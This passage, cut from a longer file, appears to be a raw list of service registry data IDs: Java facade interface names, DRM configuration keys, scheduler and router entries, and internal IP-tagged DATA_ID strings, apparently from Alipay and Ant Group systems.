#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_YAOWEI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcardcenter.common.service.facade.TbcinemaCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccFlowNodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.boss.facade.service.InOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.punishcenter.strategy.PunishStrategyLogCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.17.166.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insproductcore.facade.service.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkarchplus_machineMigration_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.CsccActionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.biz.open.api.facade.CommonQueryModelSZ:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerExterfaceFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductFeaturesFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iexratecenter.service.facade.api.ExClientAgrMappingMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.trade.TradeIsvOrgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.QueryInstDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.234.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileorderprod.service.api.mng.IndicatorDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.alwaysSyncRefundChargeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.AutoRefreshByJSONDRM.closeRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.core.service.cache.LruCache:1.0:recruitPlanCache@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcms.common.service.facade.tradevoice.SmartPayBoxTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.component.spi.common.ComponentMeteDataConsultCallbackFacade:1.0:imtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.common.ReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdsmmgalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FincomposeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.limitcum.CumulateLogQueryFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwicbc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.52.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.biz.service.ops.OpsService:1.0:answerInsertOpsService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.zhihuContentLength,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:financingAsset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:acmantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.GenericBaselineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofamesh.sofa4RpcMosnClient.facade.Sofa4RpcMosnClientRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:inviteApplyAuditFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.switchToRatingRollback,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:mobilerelationtwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.level1VariableSnapshotCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudinc.common.service.facade.NormalDomainOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.BuInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.iriskperceptcenter.common.service.facade.monitorprogram.MonitorDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_PUBLICTEST_MESSAGE_TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.sendMessageDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.LittleAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchstoreapp.common.service.facade.sst.SSTEcardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.couponcore.common.service.facade.CouponQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PROMO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openexprod.common.service.facade.PartnerExterfaceOpenexprodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cfpcenter_antprocess_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FILEBRIDGE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.apply.RepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcateringorder.common.service.facade.api.order.CateringOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cryptprod.common.service.facade.crypto.SignatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-promohelix-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_PCREDITDECISIONX#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.capacitystudio.portrait.AppZonePortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.user.account.AlipayCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.price.PriceOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertVerifyInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.certifymng_misc_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.40.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.biz.crp.drm.CompositeStrategyDrmResource.domain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.biz.tradepush.core.PushCheckScheduleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CreditAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mobileapp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataArrangeService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.computer.ComputerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmcustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.FinanceProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkibdeposit.common.service.facade.process.IbdProcessTaskInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemigrate.common.service.facade.api.task.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.SlaConfigResource.batchAgentDispatchCountMachine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.226.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:DEGG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateEmergencyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.cashback.CashBackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:kgopenalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.manualCompleteStarWish,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.biz.money.core.MoneyAccountInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.LogisticsBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.cloudatlas.service.CloudAtlasPortrayalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PromobenchWorkOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdrmdata.facade.DrmDataOperationLDCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.msg.ICrowdMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouWufuPersonEntityRelationPersonSideDbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobile.mdevsupport.facade.alarmanalysis.ChangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.InspectionPaymentUserManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.operating.facade.pub.CommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.FindResourceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityLiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.biz.ActivityGoodsQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.ExternalImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:bigbrother@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ChannelMigrateParamDrmResoureInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.49.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.amberdata.metadata.service.SearchConfigService:1.0:searchConfigService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.ordermng.apaysales_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:mrchcommercelab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.common.SystemParameterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inscharityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CPCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.integrationprod.common.service.facade.HistoricalAccountingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@antassistant#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.habaseline.common.facade.service.change.seeker.ChangeSeekerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.outflux.InfluxidNetidMapService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.101.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdgpMngProcessCallbackImpl_bkdgp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.CommonHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.MerchantArQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.TransportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.manager.LoanDetailTotalManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.BizLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.industrycoupon.IndustryCouponServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdOrganizationManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.shared.infosec.InfoSecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:consumeprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodmng.facade.taitan.Aboss2CloudSsuPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.operation.common.service.facade.api.label.LabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.yunfengdie.servicemodel.YFDServiceModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot-web-zdal-dds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promoprod.common.service.integration.mobilepep.EventMsgFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.10.219.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.huanyu.biz.apibus.facade.saas.GrayProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.rule.VcpVoucherRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.unlockTimeoutSerialMaxNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.auth.client.service.ProjectRoleService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.binding.DeviceInfoManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rctrack.ReplayBizStrategyConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.innertrans.common.service.facade.api.InnerTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileiclib.common.service.facade.management.VerifyCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@govbizcenterdeploy#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.iotcore.spi.RpcSpi:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExClientAgrMappingQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.biz.platform.task.complainmessage.FraudFeedBackWordingSwitch:1.0:fraudFeedBackWordingSwitch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.claim.AutoInsClaimFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:publichome_baseInfoModifyAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_M_CREDITPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthPullAccListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlbs.facade.crowd.CrowdMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.apshopcenter.common.service.facade.DynamicPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmopenapi.service.facade.MaYiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.paytoolType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ap.dcommservice.common.service.facade.UniDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxcore.common.service.facade.api.operation.ServiceDiagnosisViewMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:fundmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.AirbnbRoomInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:qconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcactivitycore.facade.task.PcreditRepayTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdPositionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimcenter.common.service.InsClaimAuthorizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.devapi.facade.TestToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.category.api.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finpromoscene.common.service.facade.api.asset.FinsRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.PhysicalDataSourceService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CALENDAR_REMIND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileacauth.service.terminal.facade.TerminalService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.FaultDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCenterCodeVersionDrm.settleDayCalVersionValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:creditexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.delta.facade.api.FlowControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FILECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.attribute.RuleAttributeService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.searchportal.common.service.aisearch.client.AIEngineSearchClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:mda@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finriskeventseek.facade.ChangeFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prodtrans.senior.query.facade.ProdtransQueryExtPropFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifmng.service.facade.RequirementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:afrprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.newSgwRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.pressure.PressureRouteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.NomoCategoryInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.GiftGoldSignTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.framodel.core.service.facade.api.FramodelModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minicoreAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.PrivacyQuestionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.contract.common.service.facade.api.ContractTemplateConfigOrderHandleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:wealthwatchdogtwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.productCodeLDCSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.common.SystemParamServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.tradeapcore.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:payTimeoutHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwalletmng.common.service.facade.baas.clientSwitch.ClientSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.ChildAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DR